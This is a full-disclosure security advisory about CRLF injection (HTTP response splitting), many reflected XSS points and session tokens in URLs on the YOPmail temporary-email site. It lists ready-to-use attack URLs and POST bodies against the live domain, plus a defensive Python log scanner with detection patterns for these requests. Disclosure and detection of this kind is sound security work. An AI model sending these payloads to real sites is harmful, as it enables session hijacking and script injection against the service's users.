YOPMAIL (Anonymous & Free email address) CRLF Injection - HTTP Response Splitting / XSS / Session Token in URL
==================================================================================================================================================

Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: Response
2013-06-07: Ask About the Issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / No Response
2013-06-28: Full Disclosure

I-VULNERABILITIES
======================
#Title: YOPMAIL (Anonymous & Free email address) YopMail CRLF Injection - HTTP Response Splitting / XSS / Session Token in URL
#Vendor: http://www.yopmail.com
#Author: Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter: @secnight

II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. It keeps a message up for 8 days. It is possible to send a message to another YOPmail address. No registration is required. Firefox, Internet Explorer 7 and Opera add-ons are downloadable. There are alternate domains.

Domains
@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net

The site gets new domains every three months.

III-PROOF OF CONCEPT
======================

CRLF INJECTION - HTTP RESPONSE SPLITTING
______________________________________
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack.
Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include cross-site scripting (XSS), cross-user defacement, poisoning of the client's web cache, hijacking of web pages, defacement and a myriad of other related attacks.

Attacks
-------
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717

Multiple CROSS SITE SCRIPTING
_______________________________
The concept of XSS is to manipulate the client-side scripts of a web application so that they execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which is then executed every time the page is loaded, or whenever an associated event is triggered.

Attacks
--------
Below I expose only a few of the vulnerabilities, because there are many failures of this type in this web service... So much XSS..
Affected items
--------------
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php

Method GET
----------
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------
http://www.yopmail.com:80/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

SESSION TOKEN IN URL
____________________
This application carries a session token in the query parameters. A session token is sensitive information and should not be stored in the URL, because URLs can be logged or leaked via the Referer header.
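As an added example (not part of the advisory), a small log-review check in Python that flags, in access-log request lines, the three request shapes reported above: a CR/LF pair inside a query parameter (the cr.php cfg case), a script tag or inline event handler in the path or parameters (the reflected XSS probes), and a session identifier carried in the query string (PHPSESSID). The sample request lines are constructed from the URLs quoted in this advisory, and every session parameter name other than PHPSESSID is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request lines modelled on the URLs quoted in this advisory;
# they are not captured YOPmail traffic.
SAMPLE_LOG = """\
GET /cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524 HTTP/1.1
GET /es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1
GET /en/send-mail.php?act=n&login=alice HTTP/1.1
POST /email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1
GET /en/plugins.php/%22onmouseover=prompt(908426)%3E HTTP/1.1
"""

# Parameter names that carry a session identifier. PHPSESSID is the one the
# advisory shows; the others are assumed equivalents on other stacks.
SESSION_PARAMS = {"phpsessid", "jsessionid", "sessionid", "sid"}
CRLF = re.compile(r"[\r\n]")
# A script tag, or an inline event handler ("onmouseover=") preceded by a
# quote or whitespace: the shape of the reflected-XSS probes listed above.
XSS_HINT = re.compile(r"<\s*script|[\"'\s]on\w+\s*=", re.IGNORECASE)


def inspect_request_line(line):
    """Return finding tags for one 'METHOD target HTTP/x' request line."""
    fields = line.split(" ")
    if len(fields) < 2:
        return ["unparseable"]
    parts = urlsplit(fields[1])
    # parse_qsl percent-decodes once, so %0d%0a becomes a real CR LF pair
    # and would terminate a header if echoed into the response verbatim.
    params = parse_qsl(parts.query, keep_blank_values=True)
    findings = []
    for name, value in params:
        if CRLF.search(value):
            findings.append(f"crlf-in-param:{name}")
        if name.lower() in SESSION_PARAMS:
            findings.append(f"session-token-in-url:{name}")
    decoded = [unquote(parts.path)] + [value for _, value in params]
    if any(XSS_HINT.search(text) for text in decoded):
        findings.append("xss-probe")
    return findings


def scan(log_text):
    """Inspect every non-empty line; results keep the input order."""
    return [inspect_request_line(line) for line in log_text.splitlines() if line]


if __name__ == "__main__":
    for line, findings in zip(SAMPLE_LOG.splitlines(), scan(SAMPLE_LOG)):
        print(findings or "clean", "<-", line)
```

The same check applied at the application boundary (rejecting any header value that contains CR or LF before it reaches the response) is what removes the response-splitting condition itself.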
Affected items
--------------
/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)

Examples

Method GET
----------
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

IV. CREDITS
-------------------------
These vulnerabilities have been discovered by Juan Carlos García (@secnight)

V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.